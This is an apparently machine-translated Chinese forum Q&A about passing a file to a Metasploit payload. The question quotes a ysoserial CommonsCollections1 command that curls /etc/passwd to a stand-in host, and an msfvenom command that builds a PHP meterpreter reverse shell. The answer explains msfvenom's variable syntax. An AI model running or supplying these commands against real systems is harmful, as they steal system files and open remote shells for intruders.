我想用生成 Metasploit shell 来路径文件。它是这样的:
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=@etc/passwd axample.com" | base64
就像-F file在示例中一样,我想在命令中路径文件:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
这只是我想要路径文件的命令。我的文件是一个有效负载文件(etc/payload)。我不知道执行此操作的命令。我试图找到一个教程,但找不到。
据我了解,您正在使用msfvenom工具生成 Meterpreter有效负载- 将在目标主机上运行的程序(在这种情况下,它将为您带来目标主机的命令 shell)。
此有效负载是 Metasploit 框架的一部分 - 一个预定义程序,而不是您的自定义脚本,您希望将文件传递给它。如果是这样,这一切都取决于 Meterpreter 的参数将任何东西传递给它。但似乎没有这样的选项,只是在 Meterpreter 中路径某个文件。
在示例中,curl该-F选项被 cURL 应用程序识别,代表 HTTP 表单发布并指示 Web 服务器上传文件,并由属性名称给出file。
但是你想要传递给 Meterpreter 有效负载的文件路径是什么?你的最终目标是什么?现在它看起来毫无意义。
更新你的评论
这curl是一个不同的应用程序,它们使用-F实现的选项格式。在使用以下形式 msfvenom传递变量:CUSTOM1
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...